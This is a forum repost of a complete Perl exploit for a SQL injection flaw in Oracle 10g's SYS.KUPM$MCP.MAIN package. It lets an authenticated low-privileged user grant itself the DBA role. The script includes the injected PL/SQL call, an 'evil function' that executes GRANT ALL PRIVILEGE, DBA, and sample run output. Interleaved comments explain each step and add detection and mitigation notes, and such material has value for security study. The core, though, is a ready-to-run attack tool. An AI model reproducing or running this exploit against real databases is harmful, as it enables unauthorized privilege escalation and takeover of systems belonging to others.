
    Oracle 10g KUPM$MCP.MAIN SQL Injection Exploit

    发布者: 土豆服务器 | 发布时间: 2025-6-28 22:51| 查看数: 57| 评论数: 0|帖子模式

    #!/usr/bin/perl
    #
    # Remote Oracle KUPM$MCP.MAIN exploit (10g)
    #
    # Grant or revoke dba permission to unprivileged user
    #
    # Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"
    #
    #   REF:    http://www.red-database-security.com/
    #   
    #   AUTHOR: Andrea "bunker" Purificato
    #           http://rawlab.mindcreations.com
    #
    #   DATE:   Copyright 2007 - Tue Mar 27 10:47:14 CEST 2007
    #
    # Oracle InstantClient (basic + sdk) required for DBD::Oracle
    #
    # bunker@fin:~$ perl kupm-mcpmain.pl -h localhost -s test -u bunker -p **** -r
    #  [-] Wait...
    #  [-] Revoking DBA from BUNKER...
    #  DBD::Oracle::db do failed: ORA-01951: ROLE 'DBA' not granted to 'BUNKER' (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at kupm-mcpmain.pl line 97.
    #  [-] Done!
    #
    # bunker@fin:~$ perl kupm-mcpmain.pl -h localhost -s test -u bunker -p **** -g
    #  [-] Wait...
    #  [-] Creating evil function...
    #  [-] Go ...(don't worry about errors)!
    #  DBD::Oracle::st execute failed: ORA-06512: at "SYS.KUPM$MCP", line 874
    #  ORA-06512: at line 3 (DBD ERROR: OCIStmtExecute) [for Statement "
    #  BEGIN
    #   SYS.KUPM$MCP.MAIN(''' AND 0=BUNKER.own--','');
    #  END;"] at kupm-mcpmain.pl line 119.
    #  [-] YOU GOT THE POWAH!!
    #
    # bunker@fin:~$ perl kupm-mcpmain.pl -h localhost -s test -u bunker -p **** -r
    #  [-] Wait...
    #  [-] Revoking DBA from BUNKER...
    #  [-] Done!
    #

    use warnings;
    use strict;
    use DBI;
    use Getopt::Std;
    use vars qw/ %opt /;

    # Write the command-line synopsis and option summary to STDOUT, then end
    # the process with exit status 0. This sub never returns to its caller.
    sub usage {
        # $0 is interpolated so the synopsis shows the name the script was run as.
        my $help_text = <<"USAGE";
         
    Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>]

    Options:
         -h     <host>     target server address
         -s     <sid>      target sid name
         -u     <user>     user
         -p     <passwd>   password

         -g|-r             (g)rant dba to user | (r)evoke dba from user
        [-P     <port>     Oracle port]

    USAGE
        print $help_text;
        exit 0;
    }

    # Main flow: parse options, log in with the supplied (low-privileged)
    # credentials, then either revoke DBA from that account (-r) or run the
    # grant path (-g). The comments below describe what each step does and
    # what a database owner can take from it for detection and hardening.

    # -h, -s, -u, -p and -P take a value; -g and -r are flags.
    my $opt_string = 'h:s:u:p:grP:';
    # A parse failure, a missing mandatory option, or neither -g nor -r
    # prints the usage text and exits.
    getopts($opt_string, \%opt) or &usage;
    &usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );
    &usage if ( !$opt{g} and !$opt{r} );
    # The account name is upper-cased and later interpolated verbatim into
    # SQL text; nothing in this script quotes or validates it.
    my $user = uc $opt{u};

    # A valid database login is required: this is privilege escalation by an
    # already authenticated account, not an unauthenticated attack. The port
    # is only added to the DSN when -P was given. The bare `die` carries no
    # message of its own.
    my $dbh = undef;
    if ($opt{P}) {
        $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;
    } else {
        $dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;
    }

    # Default statement is the grant; the -r branch below overwrites it.
    my $sqlcmd = "GRANT ALL PRIVILEGE, DBA TO $user";
    print "[-] Wait...\n";

    # Revoke path: the REVOKE is sent directly over the session. The return
    # value of do() is not checked, so "Done!" is printed even when the
    # statement fails (the header's first sample run shows ORA-01951 followed
    # by "Done!").
    if ($opt{r}) {
        print "[-] Revoking DBA from $user...\n";
        $sqlcmd = "REVOKE DBA FROM $user";
        $dbh->do( $sqlcmd );
        print "[-] Done!\n";
        $dbh->disconnect;
        exit;
    }

    # Grant path, step 1: create a function named OWN in the connecting
    # user's schema. AUTHID CURRENT_USER makes it invoker-rights, i.e. it
    # runs with the privileges of whatever code calls it. The autonomous
    # transaction plus explicit COMMIT makes the embedded statement commit
    # on its own, independent of the calling transaction.
    # Hardening note: creating this object needs the CREATE PROCEDURE
    # privilege, which accounts that only query data do not need.
    print "[-] Creating evil function...\n";
    $dbh->do( qq{
    CREATE OR REPLACE FUNCTION OWN RETURN NUMBER
    AUTHID CURRENT_USER AS
    PRAGMA AUTONOMOUS_TRANSACTION;
    BEGIN
    EXECUTE IMMEDIATE '$sqlcmd'; COMMIT;
    RETURN(0);
    END;
    } );

    # Grant path, step 2: call SYS.KUPM$MCP.MAIN with a first argument that
    # contains a quote character, a predicate referencing the function above,
    # and a trailing SQL comment marker.
    # NOTE(review): this has the shape of SQL injection into a package that
    # concatenates its argument into dynamic SQL; the package body is not
    # shown here, so the exact vulnerable statement is an assumption. Since
    # the package is in the SYS schema, the injected function call (and the
    # GRANT inside it) presumably runs with SYS's privileges -- confirm
    # against the vendor advisory.
    # The execute is expected to raise an error (the header's sample run shows
    # ORA-06512 at "SYS.KUPM$MCP"); in that same sample the later REVOKE
    # succeeds, which indicates the grant had taken effect despite the error.
    # Detection: audit for a non-DBA account creating a function and then
    # triggering ORA-06512 errors from SYS.KUPM$MCP, and review DBA_ROLE_PRIVS
    # for unexpected DBA grantees.
    # Mitigation: apply the vendor's security patches covering this package
    # and review EXECUTE grants on SYS-owned packages.
    print "[-] Go ...(don't worry about errors)!\n";
    my $sth = $dbh->prepare( qq{
    BEGIN
    SYS.KUPM\$MCP.MAIN(''' AND 0=$user.own--','');
    END;});
    $sth->execute;
    $sth->finish;
    # Printed unconditionally: the script never verifies that the role was
    # actually granted.
    print "[-] YOU GOT THE POWAH!!\n";
    $dbh->disconnect;
    exit;

    来源:https://www.jb51.net/hack/5698.html